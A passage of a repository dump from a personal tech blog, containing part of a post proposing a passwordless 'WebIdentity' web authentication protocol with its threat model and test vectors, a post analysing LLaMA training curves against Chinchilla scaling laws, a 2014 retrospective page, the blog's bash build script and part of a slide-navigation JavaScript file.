a LogIn request:\n\n    Authorization: Identity v1 ReSignUp v1\n        oauid=\"VzX3h8VumdWIY7MiUCcYwnS8kz9DxdtFzQftFhLvkFkK\"\n        olip=\"R05PEuFZHCngevxsxJZsIDeJe66IDGYqoH3JBVtT-DcK\"\n        auid=\"yFvfOjHW68qyhMIPobZdL6oZmIIOD7aEVquwkkbbxS4\"\n        liv=\"yWPeXDGFi3q8ZAwVOAvbv5swl6oVoOScw7Y3CDVPQCM\"\n\n- `ReSignUp` is a new action to instruct the website to reset the UIDs everywhere it matters, and provide a new LISK.\n- `v1` means that the protocol used for the old IDs and tokens is v1. This is useful for the “Hash function theoretically broken” section.\n- `VzX3…` is the old Authentication User ID (AUID).\n- `R05P…` is the old Log-In Proof (LIP).\n- `yFvf…` is a new Authentication User ID (AUID).\n- `yWPe…` is a new Log-In Verification token (LIV),\n  a MAC of the new AUID keyed with the new Log-In Proof (LIP).\n- The new LID is sent in the Date header (`Fri, 03 Jul 2020 16:03:26 GMT`).\n\nThe website treats it just like a LogIn request, except it also updates the UID in database.\n\nA Browser Sync breach would obviously be a major event.\nIn the old password world, it is equivalent to\nhaving the worldwide Google Chrome passwords leaked. It would cause all Chrome users\nto need to reset their passwords one by one on every website.\n\nThankfully, with WebIdentity, this can be automated by the browser seamlessly.\n\nFirst, the browser will need to close the breach.\nThen, for each user, it will automatically trigger the Browser Key Reset procedure remotely.\n\nObviously, just as with a Google Chrome password leak,\nadversaries could take control of user accounts by doing a ReSignUp on their behalf.\nWebIdentity is better in this respect: the browsers can automatically update information,\nleaving a small window for attackers to take over accounts;\nwhile a password leak may have users that take years to update a given password.\n\nJust as with passwords, it is recommended that browsers implement Sync\nin such a way that the user decrypts Sync secrets on their machine\nthrough the use of a master password.\nAs a result, the Sync servers would only contain encrypted data without the key.\nObviously, even a leak of the mere encrypted data should trigger a ReSignUp,\nbut at least the risk of user account takeover would be greatly reduced.\n\n### Hash function theoretically broken\n\nIt took ten years from SHA-1 publication to full-round collisions.\nWhile SHA-2 has already survived twenty,\nit is plausible that it gets eventually broken theoretically.\nThat was the motivation for the SHA-3 process,\nwhich yielded a primitive seemingly likely to take even more time\nthan SHA-2 to get broken, thanks to its sponge construction.\n\nWhen SHA-2 gets theoretically broken,\nwe will release v2 of the protocol.\nBrowser vendors and website operators will need to implement it\nbefore it gets practically broken\n(which for SHA-1 took ten years).\n\nWebsites supporting v2 must also support v1 for at least ten years,\nwhich ought to be enough time for browser vendors to implement v2.\n\nWhen browsers only support v1, and see support for v2 from a website,\nthey must send v1 requests, and the website must follow the v1 protocol.\n\nWhen browsers implement v2 and hold a v1 authentication AUID/LISK,\nthey must follow the Browser Key Reset procedure.\n\n### Threat models\n\n- Website attack:\n  - From a third party:\n    - **Replay attack**: If they replay the encrypted request of an authenticated user within the 30-second window, they may trigger the corresponding action (eg. a bank transfer) twice.
We recommend that websites implement idempotency checks, as this could also happen from network glitches.\n    - If they get **read access to the website** database, the UID gives no information that can be used to authenticate on behalf of the user.\n      - If they also compromise WK, the **website key**, they still lack the AUID (which is not stored) to be able to do anything.\n    - If they compromise the **website’s TLS encryption**, such as with the [CloudFlare memory leak][], they can read the encrypted payloads between the user and the website.\n      - Reading the requests gives them a valid AUID/LID/TOTP set, but they only have a 30-second window (1 minute in rare worst-case clock drifts) to perform authenticated requests on behalf of the user, as they lack the LISK to be able to MAC new dates. They cannot issue a LogIn or ReSignUp request, lacking the LIP; and this remains true even if they additionally compromise the WK and database. Security-wise, this is a significant improvement compared to JWT, PASETO and similar session token approaches, which typically have anywhere from 5 minutes (for access tokens) to months of lifetime (for refresh tokens). An attacker reading a JWT refresh token in the encrypted payloads can typically use it to get unlimited access tokens for weeks if not forever. By contrast, with WebIdentity, this attacker would be able to make authenticated queries for at most a minute, but usually half that (as most clients will not have much clock drift).\n      - They can also read SignUp requests, although those will be rarer. The response includes the LISK, letting them fabricate valid TOTPs past 30 seconds. However, it will be invalidated through automatic logout after up to one hour. LISKs older than one hour will be useless to an attacker. On the other hand, if they can read the TLS traffic on-the-fly, they can view the new LISKs. As long as they maintain this ability, they can authenticate on behalf of the user. The flaw must be fixed by the website, and all LIDs invalidated, forcing a re-login.\n    - If they compromise both the **website’s TLS encryption and its WK**:\n      - For each AUID/LID/TOTP they see in the encrypted traffic, if the LID is still valid, they can derive the current LISK, and with it, perform authenticated requests for up to one hour (after which the automatic logout will prevent that).\n      - Similarly, they can get the LISK from SignUps and LogIns. If they can read the traffic on-the-fly, they can see the new LISKs produced even after the one-hour logout. Again, the solution is to fix the flaw and invalidate the LIDs.\n  - From **another website**: knowledge of that website’s AUID is insufficient to guess other websites’ AUID (that requires knowing the BK), let alone the LISK (which requires that website’s WK).\n  - From the **user**: knowledge of the LISK is insufficient to guess WK, the Website Key, and therefore, to make authenticated requests on behalf of other users of the website. Additionally, even if they could, knowledge of other users’ AUID would be necessary, which requires knowing their BK.\n  - From the **browser**: since it has access to the Sync secrets, it can perform authenticated requests and account takeover for all its registered users. However, it cannot do so for users of other browsers, if their BK is not explicitly shared.\n- Browser attack:\n  - **XSS**: Since WebIdentity is controlled by the browser and has no JS integration, JS code cannot access secrets or perform authentication.
All the exchanges and headers related to WebIdentity must be hidden from the page transparently. All same-origin requests are authenticated or not depending on whether the user has clicked the Log In button, and depending on the [credentials mode][]. Cross-site requests comply with CORS. The Authorization and WWW-Authenticate headers already have the right protections in place.\n  - Browsers should never have BK on the device. They can store the websites’ KID, AUID and LISK. An attacker that gains access to the **device’s permanent or memory storage** will be unable to obtain the BK, and therefore sign up on new websites. They can however make authenticated requests on behalf of the user to websites in which they are signed up, for up to one hour after they lose access. It is therefore necessary for browsers to encrypt the Sync database (with the LISK) if they cache it locally, which is already the case. They should not use an encryption key that is common to multiple users (also already the case IIUC).\n  - The Operating System and the CPU, on the other hand, can obviously access the BK **in memory** and perform authenticated requests and account takeover on behalf of the user, but not of other users.\n  - **BK loss**: the Browser Sync could experience complete loss of data, including the BK, maliciously or accidentally. The consequence would be the same as a password manager, today, losing the passwords (which indeed is the main thing it wishes to guarantee as a business), or a website using WebAuthn as its only primary authentication and the user losing their device (Yubico etc.): users would no longer be able to log in. However, people that switched browsers or backed up their BK would be able to add it back in using the *Browser Export* procedure.\n\n### Cryptographic comments\n\nThe whole scheme is extremely inexpensive and simple to implement, both for websites and browsers,\nespecially compared to current techniques (which involve, for instance, the expensive Argon2 for passwords).\nThe payload weight is marginal.\n\nIt also does not make use of public-key cryptography,\nwhich protects it from the threat of quantum computing advances.\nThe main impact might be longer hashes, although even that is in question.\n\nThe protocol is versioned in such a way that there is no cryptographic algorithm agility,\nin line with common practices such as [age][] and [PASETO][].\n\nThe MAC algorithm for v1 of the protocol is HMAC-SHA256.\n\n(I would love to put BLAKE3 here, but some websites will object to a non-NIST-approved primitive.\nAnd SHA3 (with no HMAC!)
would also be nice, I would love to argue for its use;\nbut it is true that some websites may have legacy and dependency constraints;\nand unlike WebAuthn, the goal of WebIdentity is to quickly get very widespread adoption\nas the primary authentication mechanism on the Web.)\n\nAll [base64url][] inputs must be converted to a byte buffer prior to use.\nThe implementation should be constant-time.\n\nThe eTLD+1 must be in ASCII punycode form for use in WebIdentity (simplifying debugging).\n\n## Vectors\n\nThe examples use:\n\n- Website eTLD+1: `example.org`.\n- BK: `GVr2rsMpdVKNMYkIohdCLhOeHSBIL8KBjoCvleDbsJsK` (generated with `head -c 32 </dev/urandom | base64 | tr +/ -_`).\n- WK: `DCmk1xzu05QmT578_9QUSckIjCYRyr19W0bf0bMb46MK`.\n- MACs generated with `echo -n \"$input\" | openssl sha256 -hmac \"$key\" | cut -f2 -d' ' | xxd -r -p | base64 | tr +/ -_ | tr -d =`.\n\nThe script to generate the examples is available [here][TestVectors];\nrunning it yields all values used in examples.\n\n## Acknowledgements\n\nThanks go to /u/josejimeniz2 for considering the risk of Sync data loss,\nand to /u/haxelion for raising the risk of having the BK on the device\n(which is no longer the case in the current draft).\n\n## Comments and links\n\n[Blog comments here](https://www.reddit.com/r/espadrine/comments/hlrx40/webidentity_oneclick_passwordless_signups_logins/).\n\n[MemorablePasswords]: https://espadrine.github.io/blog/posts/memorable-passwords.html\n[line of death]: https://textslashplain.com/2017/01/14/the-line-of-death/\n[PublicSuffix]: https://publicsuffix.org/\n[RegistrableDomain]: https://chromium.googlesource.com/chromium/src/+/master/docs/security/url_display_guidelines/url_display_guidelines.md#registrabledomain\n[credentials mode]: https://fetch.spec.whatwg.org/#ref-for-concept-request-credentials-mode\n[CloudFlare memory leak]: https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/\n[age]: https://github.com/FiloSottile/age\n[PASETO]: https://paragonie.com/files/talks/NoWayJoseCPV2018.pdf\n[BLAKE3]: https://github.com/BLAKE3-team/BLAKE3-specs/blob/master/blake3.pdf\n[base64url]: https://tools.ietf.org/html/rfc4648#section-5\n[WebAuthn]: https://webauthn.guide/\n[Apple]: https://developer.apple.com/videos/play/wwdc2020/10670/\n[quantum-resistant]: https://en.wikipedia.org/wiki/SHA-3#Security_against_quantum_attacks\n[TestVectors]: https://github.com/espadrine/espadrine.github.com/blob/master/blog/assets/webidentity/test-vectors.sh\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2020-07-05T20:19:02Z\",\n \"keywords\": \"crypto, web\" }\n</script>\n"
},
{
"alpha_fraction": 0.7449715733528137,
"alphanum_fraction": 0.7656793594360352,
"avg_line_length": 45.94422149658203,
"blob_id": "42605c21f2564cd18fdb6664bc398c746cf86d09",
"content_id": "7be8e4a8408bdb1435153da7bf29c54a9a1d1ed6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 11827,
"license_type": "no_license",
"max_line_length": 168,
"num_lines": 251,
"path": "/blog/src/chinchilla-s-death.md",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "# Chinchilla’s Death\n\n> “With more careful calculations, one can win; with less, one cannot”\n> — Sun Tzu, *The Art of War*.\n\nMaking extrapolations is crucial to avoid wasting our computing power on slow\nconvergence. After all, if you had to walk to the Everest,\nyou wouldn’t eyeball it: you would use a GPS.\n\nSometimes you have to look away from the GPS and onto the road, though.\nSometimes things don't extrapolate through simple formulae.\nIt was true for XIXth-century physicists with the [ultraviolet catastrophe][];\nit is true for LLMs too.\nWhat we estimate to be true near the center can deviate widely in the far lands…\n\n\n\n## What’s this Chinchilla thing anyway?\n\nSmaller models have fewer multiplications.\nThus they run faster. Thus they train faster.\nHowever, the theory goes, they eventually reach the limit of their capacity for\nknowledge, and their learning slows, while that of a larger model,\nwith a larger capacity, will overtake them and reach better performance\npast a given amount of training time.\n\nWhile estimating how to get the best bang for the buck during training,\nboth [OpenAI][scaling] and [DeepMind][chinchilla] attempted to draw the Pareto\nfrontier. They don’t state explicitly that they use that theory to draw it;\nthe closest quote that hints at this hidden assumption is from OpenAI:\n\n> We expect that larger models should always perform better than smaller models.\n> […]\n> A model with fixed size will be capacity-limited.\n\nThis presumption is the bedrock of how they compute the Pareto frontier.\nIn the Chinchilla work, figure 2 shows the training loss of a large number of\ntraining runs for models with varying size.\nAt a first glance, those curves follow the theory:\nthe smaller models initially have a lower loss (good),\nbut eventually it slows down,\nand gets overtaken by the curve from a larger model (bad).\n\n\n\nIn that chart, they drew grey dots every time they pinpointed the smaller model\nstarting to lose out to a larger model.\nThe grey line, the Pareto frontier, is how they computed their scaling laws.\n\nThe problem with this assumption is that\nwe have no idea what would happen if we let the smaller model train for longer,\nsince they stopped its training as soon as it was overtaken.\n\nEnter the LLaMA paper.\n\n## Can Chinchillas picture a Llama’s sights?\n\nEarlier this year, Meta trained four models with varying sizes.\nUnlike other works, they trained each of them for a very large amount of time;\neven the smaller ones.\n\nThey published the training run curves:\n\n\n\n1. Each curve first plummets in a **power law**,\n2. and then seemingly enters a **nearly-linear** decrease in loss\n (corresponding to a fairly constant rate of knowledge acquisition).\n3. 
The model’s fitness landscape does not depend on the amount of data\nwe can feed its training; so the change in learning rate decrease\nis not well-justified.\n\nThat is not the main point of this article, though.\n\nThe training loss curve can be misleading in another way.\nSure, they are all trained on the same data;\nbut they don’t go through that data at the same speed.\nWhat we want to know is **not** how sample-efficient the model is\n(on this front, the larger model clearly learns more from what it saw).\nLet’s picture instead a race:\nall those models start at the same time,\nand we want to know which one crosses the finish line first.\nIn other words, when throwing a fixed amount of compute at the training,\nwho learns the most in that time?\n\nThankfully, we can combine the loss curves with another piece of data that Meta\nprovided: the amount of time that each model took to train.\n\n<table>\n  <tr><th> Model </th><th> GPU-hours </th><th> Tokens/second </th>\n  <tr><td> LLaMA1-7B </td><td> 82432 </td><td> 3384.3 </td>\n  <tr><td> LLaMA1-13B </td><td> 135168 </td><td> 2063.9 </td>\n  <tr><td> LLaMA1-33B </td><td> 530432 </td><td> 730.5 </td>\n  <tr><td> LLaMA1-65B </td><td> 1022362 </td><td> 379.0 </td>\n</table>\n\n\n\n[*(Code for generating the graph here.)*][code]\n\n
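The conversion itself is simple; assuming the Tokens/second column is per-GPU throughput, a curve’s x-axis goes from tokens read to GPU-hours spent like this:\n\n    def gpu_hours(tokens_read, tokens_per_gpu_second):\n        # Wall-clock GPU budget consumed after reading a number of tokens.\n        return tokens_read / (tokens_per_gpu_second * 3600)\n\n    # Sanity check: LLaMA1-7B read 1 trillion tokens.\n    print(gpu_hours(1.0e12, 3384.3))  # ~82,000, close to the table's 82432.\n\n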
\nLet’s first mention that the whole Chinchilla graph that we saw\ncovers only a small sliver on the left of this graph.\nIn that sliver, we see the same behaviour that Chinchilla documents.\nLook at the 7B, for instance (which in the Chinchilla graph would actually be\namong the top two curves in terms of size):\nit initially drops its loss much faster than the bigger models, then slows down,\nand the 13B model overtakes it and reaches a loss of 1.9 first.\n\nBut then comes an unexpected, far-lands twist: the 7B enters a near-linear\nregime, with a steep downward trend, and seems on its way to overtake the\n13B again. It is hard to tell from that graph what would happen if the 7B were\ntrained for longer.\n\nHowever, the same behaviour seems to hold between the 13B and the 33B:\nthe initial Chinchilla slowdown also gives way to a near-linear regime,\nin which the 13B goes down fast! The 33B only surpasses it unfairly,\nby being granted more than double the compute time.\n\nAnd the same slowdown-then-speedup occurs between the 33B and the 65B,\nto such an extent that the 33B never actually gets overtaken by the 65B.\nWhat the graph shows breaks OpenAI’s and Chinchilla’s assumption:\n**the bigger model hasn’t won** (yet).\nThe slowdown they detected is not actually caused by reaching some capacity limit!\n\nStill, that 7B line is a bit unsatisfactory.\nIf only Meta had trained it for longer…\n\nSuspense over: they did! They released LLaMA 2 this week!\n\n## Time to confirm our suspicions\n\n\n\nWe also, again, got the training times:\n\n<table>\n <tr><th> Model </th><th> GPU-hours </th><th> Tokens/second </th>\n <tr><td> LLaMA2-7B </td><td> 184320 </td><td> 3031.9 </td>\n <tr><td> LLaMA2-13B </td><td> 368640 </td><td> 1515.9 </td>\n <tr><td> LLaMA2-34B </td><td> 1038336 </td><td> 533.7 </td>\n <tr><td> LLaMA2-70B </td><td> 1720320 </td><td> 322.1 </td>\n</table>\n\n\n\nImmediately, at a glance, we notice that the training curves don’t match those\nof LLaMA 1, even when the models are identical.\nAs it turns out, LLaMA 2 was trained with double the context size and a longer\ncosine schedule, which unfortunately hurt quality across all model sizes;\nsmaller models, however, were hit harder than larger ones.\nAs a result, the 34B model, whose LLaMA 1 counterpart (the 33B) always remained\nbetter than the 65B at any amount of training time spent,\nnow starts out slightly above the 70B model’s curve,\nbefore overtaking it:\n\n\n\nMore importantly, comparing the training speeds strongly confirms our suspicions\nfrom LLaMA 1:\n\n1. First, smaller models are faster than bigger ones,\n2. Then, they slow down, and are overtaken by larger models (as per\n   Chinchilla),\n3. BUT THEN, they enter the near-linear regime, in which smaller models have a\n   steeper descent into superior knowledge, and they overtake larger models\n   yet again!\n\nA fascinating consequence ties into making the right choices\nwhen starting a training run:\ncontrary to popular belief, **for a fixed compute budget, larger models can\nyield worse results**.\nIf you had to pick a parameter size and dataset, you might be better off opting\nfor a 7B model and training for 7 epochs on trillions of tokens.\n\nLook at the near-linear regime of the 7B model, and extrapolate its line to when\nthe 70B model stopped:\nhad the 70B computation been spent on the 7B instead,\nit would potentially have reached a lower loss!\n
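Here is that extrapolation as a back-of-the-envelope computation, using the throughput table above (the resulting token count is an estimate, not a published figure):\n\n```\n# Spending the 70B training budget on the 7B instead:\nbudget_gpu_hours = 1720320  # LLaMA2-70B\ntokens_7b = 3031.9 * budget_gpu_hours * 3600\nprint(f'{tokens_7b / 1e12:.1f}T tokens')  # 18.8T, over nine times the 2T it actually read.\n```\n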
\nAnother thing we notice from LLaMA 2 is that the learning slowdown at the end of\nthe LLaMA 1 curves was indeed an artefact of the cosine schedule.\nThat slowdown is completely absent from the LLaMA 2 training run at the\ncorresponding mark of 1 trillion tokens read.\n\nIn fact, the reason that, at that same mark, the LLaMA 2 7B model is of worse\nquality than the LLaMA 1 7B model was,\nmay be that *its cosine schedule is stretched*!\n\nLet’s go back to the Chinchilla paper to argue that point.\nIn appendix A, figure A1, they show an ablation study for various cosine\nschedule parameters (phrased another way:\nvarious ways to stretch the learning rate curve).\n\n\n\nThey make the point that the lowest loss is achieved when the curve is not\nstretched. That is supported by the graphs, but we notice something off.\nAfter reading 6 million tokens, the training loss of the top run is below 2.8;\nmeanwhile, at the same mark, the training loss of the bottom run is above 2.8.\nYet the only difference between the two runs is the cosine schedule!\nBecause the bottom run was slated to go through more training data,\nthe “unstretched” cosine schedule was computed for a larger number of steps,\nwhich effectively stretches it.\nIf the learning rate had instead followed\nthe schedule assigned to fewer training steps,\nit would have achieved a better loss for the same amount of training time.\n\nMore broadly, that raises a question that I leave open:\nif the cosine schedule is not optimal,\nwhat shape should its tail have instead?\n\n[ultraviolet catastrophe]: https://en.wikipedia.org/wiki/Ultraviolet_catastrophe\n[scaling]: https://arxiv.org/abs/2001.08361\n[chinchilla]: https://arxiv.org/abs/2203.15556\n[llama1]: https://arxiv.org/abs/2302.13971\n[llama2]: https://arxiv.org/abs/2307.09288\n[cosine]: https://arxiv.org/pdf/1608.03983.pdf\n[code]: https://github.com/espadrine/espadrine.github.com/blob/master/blog/assets/chinchilla-s-death/llama-data.py\n\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2023-07-23T17:35:02Z\",\n \"keywords\": \"gpu, ml\" }\n</script>\n"
},
{
"alpha_fraction": 0.697982132434845,
"alphanum_fraction": 0.7254382967948914,
"avg_line_length": 72.75609588623047,
"blob_id": "291fe7bf8c4220e3b2b74a9e5c71c466ea01b794",
"content_id": "89c12de97e74feaf033e51e7007d7ea9046b2a2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 3032,
"license_type": "no_license",
"max_line_length": 227,
"num_lines": 41,
"path": "/blog/posts/what-i-made-on-year-2014.html",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "<!doctype html><meta charset=utf-8>\n<title> What I Made On Year 2014 </title>\n<link href=../blog.css rel=stylesheet>\n<link rel=\"stylesheet\" href=\"https://cdn.jsdelivr.net/npm/[email protected]/dist/katex.min.css\" integrity=\"sha384-AfEj0r4/OFrOo5t7NnNe46zW/tFgW6x/bCJG8FqQCEo3+Aro6EYUG4+cU+KJWu/X\" crossorigin=\"anonymous\">\n<link rel=\"stylesheet\" href=\"https://cdn.jsdelivr.net/gh/highlightjs/[email protected]/build/styles/default.min.css\">\n<link rel=\"alternate\" type=\"application/atom+xml\" title=\"Atom 1.0\" href=\"feed.xml\"/>\n<link rel=\"alternate\" type=\"application/json\" title=\"JSON Feed\" href=\"feed.json\" />\n<meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n<main>\n <nav class=social-links>\n <object type='image/svg+xml' data='https://img.shields.io/badge/blog-46-green?style=social&logo=rss&logoColor=e5732f&link=https://espadrine.github.io/blog/&link=https://espadrine.github.io/blog/feed.xml'></object>\n <object type='image/svg+xml' data='https://img.shields.io/github/followers/espadrine?label=Github&style=social&link=https%3A%2F%2Fgithub.com%2Fespadrine&link=https%3A%2F%2Fgithub.com%2Fespadrine%3Ftab%3Dfollowers'></object>\n <object type='image/svg+xml' data='https://img.shields.io/twitter/follow/espadrine?label=Twitter&style=social'></object>\n </nav>\n <article class=relative>\n<h1 id=\"What_I_Made_On_Year_2014\">What I Made On Year 2014 <a href=\"#What_I_Made_On_Year_2014\" class=\"autolink-clicker\" aria-hidden=\"true\">§</a></h1>\n<p>Open-source-wise:</p>\n<ul>\n<li>http://Shields.io (The first commit was, in fact, a year ago)</li>\n<li>A syntax sheet converter <a href=\"https://github.com/espadrine/ace2cm\">Ace → CodeMirror</a></li>\n<li><a href=\"http://espadrine.github.io/AsciiDocBox/\">Live AsciiDoc Editor</a> (side-by-side)</li>\n<li>Node Canvas <a href=\"https://github.com/Automattic/node-canvas/pull/465\">SVG support</a>. Write your node code with a Canvas API, get SVG back out.</li>\n<li>http://TheFileTree.com passwords and program jail, although I keep those features hidden. This year, it will allow you to write LaTeX and get the PDF back from anywhere.</li>\n<li>Not My Territory, a game I design: I got its rules right. Now, to finish implementing it…</li>\n</ul>\n<p>Otherwise, I got a diploma in engineering, got hired at https://www.capitainetrain.com, implemented comfort classes (a sub-division of travel classes for some trains), a card store page, invoices and a few other things.</p>\n<p>It’s quite fun to no longer be tied to strange decisions and absurd, chronophage school projects.</p>\n<p>I hope to do even bigger things this year, many being continuations on this year’s achievements, some (hopefully) being outstanding surprises.</p>\n<script type=\"application/ld+json\">\n{ \"@context\": \"http://schema.org\",\n \"@type\": \"BlogPosting\",\n \"datePublished\": \"2015-01-03T22:51:00Z\",\n \"keywords\": \"retro\" }\n</script>\n <footer>\n Published <time itemprop=datePublished datetime=\"2015-01-03T22:51:00Z\">3 January 2015</time>.\n <br>\n Tags: <a class=tag href=\"../index.html?tags=retro\">retro</a>.\n </footer>\n </article>\n</main>"
},
{
"alpha_fraction": 0.5142994523048401,
"alphanum_fraction": 0.5159817337989807,
"avg_line_length": 29.822221755981445,
"blob_id": "a8917bbfd90561a499c0c765e6d373aa4077a9ee",
"content_id": "0a55e1713b4af1220e310c562ffda61245a6819b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 4161,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 135,
"path": "/blog/build.sh",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ndir=$(dirname \"$BASH_SOURCE\")\ntemplate=$(cat \"$dir\"/template.html)\nlast_year=$(date -I -d 'last year')\nmkdir -p .cache/html\n\npost_links=\njsonfeed_items=\natomfeed_entries=\nlast_publication_date=\n\npublications=$(ls \"$dir\"/src/*.md | sed 's,^.*/,,; s,\\.md$,,' | \\\n { while read src; do\n echo $(<\"$dir/src/$src.md\" grep '^ \"datePublished\"' | \\\n cut -d'\"' -f4 | cut -d' ' -f2)$'\\t'\"$src\";\n done } | sort)\npubcount=$(echo \"$publications\" | wc -l)\n\necho \"$publications\" | {\n while read post; do\n name=$(echo \"$post\" | cut -d$'\\t' -f2)\n mdfile=\"$dir/src/$name\".md\n htmlfile=\"$dir/posts/$name\".html\n htmlcachefile=\"$dir/.cache/html/$name\".html\n isotime=$(echo \"$post\" | cut -d$'\\t' -f1)\n last_publication_date=\"$isotime\"\n time=$(date +'%-d %B %Y' -d \"$isotime\")\n\n # Metadata update.\n markdown=$(cat \"$mdfile\")\n title=$(echo \"$markdown\" | head -1 | sed 's/^# //')\n titlehtml=$(echo \"$title\" | sed 's/&/&/g')\n meta=$(echo \"$markdown\" |\n awk '/^<script type=\"application\\/ld/ {keep=1;next} /^<\\/script>/ {keep=0} keep')\n keywords=$(echo \"$meta\" | jq -r .keywords)\n tags=$(echo \"$keywords\" | sed 's/, */ /g')\n\n # Article page generation.\n if [[ ! -a \"$htmlcachefile\" || \"$mdfile\" -nt \"$htmlcachefile\" ]]; then\n echo \"Generating $name\"\n # The file has an update; otherwise skip its generation.\n markdown=${markdown:-$(cat \"$mdfile\")}\n content=$(echo \"$markdown\" | latexmarkdown --body)\n echo \"$content\" >\"$htmlcachefile\"\n html_tags=$(for k in $tags; do\n echo \" <a class=tag href=\\\"../index.html?tags=$k\\\">$k</a>\";\n done | sed '$!s/$/,/')\n echo -n \"$template\" \\\n | sed '\n /TAGS/ {\n r '<(if [[ \"$html_tags\" ]]; then\n echo ' Tags:'\"$html_tags\".;\n fi)'\n d\n }\n s\u001fTITLE\u001f'\"$titlehtml\"'\u001f\n s\u001fPUBCOUNT\u001f'\"$pubcount\"'\u001f\n s\u001fISOTIME\u001f'\"$isotime\"'\u001f\n s\u001fTIME\u001f'\"$time\"'\u001f\n /POST/ {\n r '<(echo \"$content\")'\n d\n }' \\\n > \"$htmlfile\"\n fi\n\n # Index page generation.\n index_html_tags=$(for k in $tags; do\n echo \" <a class=tag href=\\\"?tags=$k\\\">$k</a>\";\n done | sed '$!s/$/,/')\n post_links=$(cat <<EOF\n <li data-tags=\"$keywords\">\n <a href=\"posts/$name.html\">$titlehtml</a>\n $(if [[ \"$index_html_tags\" ]]; then\n echo \"<span class=post-tags>Tags:$index_html_tags</span>\";\n fi)\n </li>\n$post_links\nEOF\n )\n\n # RSS feeds generation.\n # We expect RSS feed clients to poll at least once a year.\n if [[ \"$isotime\" > \"$last_year\" ]]; then\n content=$(cat \"$htmlcachefile\")\n jsonfeed_items=$(cat <<EOF\n {\n \"id\": \"https://espadrine.github.io/blog/posts/$name.html\",\n \"url\": \"https://espadrine.github.io/blog/posts/$name.html\",\n \"title\": $(echo \"$title\" | jq . -R),\n \"tags\": \"$tags\",\n \"date_published\": \"$isotime\"\n \"content_html\": $(echo \"$content\" | jq . 
-Rs),\n },\nEOF\n )$'\\n'\"$jsonfeed_items\"\n\n atom_categories=$(for k in $tags; do\n echo \"<category term=\\\"$k\\\"/>\";\n done)\n atomfeed_entries=$(cat <<EOF\n <entry>\n <id>https://espadrine.github.io/blog/posts/$name.html</id>\n <link rel=\"alternate\" type=\"text/html\" href=\"https://espadrine.github.io/blog/posts/$name.html\"/>\n <title>$(echo \"$titlehtml\" | sed 's,<,<,g'$'\\n''s,>,>,g')</title>\n <published>$isotime</published>\n $atom_categories\n <content type=\"html\">\n <![CDATA[ $content ]]>\n </content>\n </entry>\nEOF\n )$'\\n'\"$atomfeed_entries\"\n fi\n done\n\n < \"$dir\"/index-template.html sed '\n /POST_LINKS/ {\n r '<(echo -n \"$post_links\")'\n d\n }' > \"$dir\"/index.html\n jsonfeed_items=\"${jsonfeed_items%??}\"$'\\n'\n < \"$dir\"/feed-template.json sed '\n /ITEMS/ {\n r '<(echo -n \"$jsonfeed_items\")'\n d\n }' > \"$dir\"/feed.json\n < \"$dir\"/feed-template.xml sed '\n s\u001fLAST_PUBLICATION_DATE\u001f'\"$last_publication_date\"'\u001f\n /ENTRIES/ {\n r '<(echo -n \"$atomfeed_entries\")'\n d\n }' > \"$dir\"/feed.xml\n}\n"
},
{
"alpha_fraction": 0.6597892642021179,
"alphanum_fraction": 0.6703248620033264,
"avg_line_length": 31.542856216430664,
"blob_id": "38f62e6b54691d86401e6976d9ee5675c5d3ac4d",
"content_id": "d930dfaae9af40d5a4e6e73a189163fd60e3fdde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2280,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 70,
"path": "/⚒/☕.js",
"repo_name": "espadrine/espadrine.github.com",
"src_encoding": "UTF-8",
"text": "// Configuration for the animation.\nvar slideTime = 100; // duration in ms.\nvar minTimeSlice = 17; // ← 60fps.\n\n// Controls for the slides: right = forward, left = back.\nwindow.addEventListener('keydown', function(e) {\n var slide = visibleSlide();\n if (e.keyCode === 39 && (slide = nextSlide(slide))) {\n slide.slideIntoView();\n } else if (e.keyCode === 37 && (slide = prevSlide(slide))) {\n slide.slideIntoView();\n }\n});\n\nfunction nextSlide(slide) {\n while (slide.nextElementSibling &&\n slide.nextElementSibling.tagName !== 'SLIDE') {\n slide = slide.nextElementSibling;\n }\n return slide.nextElementSibling;\n}\n\nfunction prevSlide(slide) {\n while (slide.previousElementSibling &&\n slide.previousElementSibling.tagName !== 'SLIDE') {\n slide = slide.previousElementSibling;\n }\n return slide.previousElementSibling;\n}\n\n// Keep track of the current slide.\n// Returns the first slide below the top of the viewport.\nfunction visibleSlide() {\n var slides = document.getElementsByTagName('slide');\n for (var i = 0; i < slides.length; i++) {\n var slideBounds = slides[i].getBoundingClientRect();\n var middleOfSlide = (slideBounds.bottom + slideBounds.top) / 2;\n if (middleOfSlide >= 0) {\n // First slide that's below the viewport.\n return slides[i];\n }\n }\n}\n\n// Animation to slide an element to the center of the viewport.\nElement.prototype.slideIntoView = function() {\n var rect = this.getBoundingClientRect();\n var endy = window.scrollY + rect.top\n - (window.innerHeight - this.offsetHeight) * 0.5;\n var jumpNPixels = 20;\n var signy = endy - window.scrollY > 0? 1: -1;\n var count = 0;\n var total = Math.abs(window.scrollY - endy);\n var timeSlice = slideTime / Math.abs(window.scrollY - endy) * jumpNPixels;\n if (timeSlice < minTimeSlice) {\n jumpNPixels = minTimeSlice * Math.abs(window.scrollY - endy) / slideTime;\n timeSlice = slideTime / Math.abs(window.scrollY - endy) * jumpNPixels;\n }\n // Scroll by jumpNPixels till we get to the slide.\n var intervalid = setInterval(function() {\n window.scrollBy(0, signy * jumpNPixels);\n count += jumpNPixels;\n if (count >= total) {\n clearInterval(intervalid);\n window.scroll(0, endy);\n }\n }, 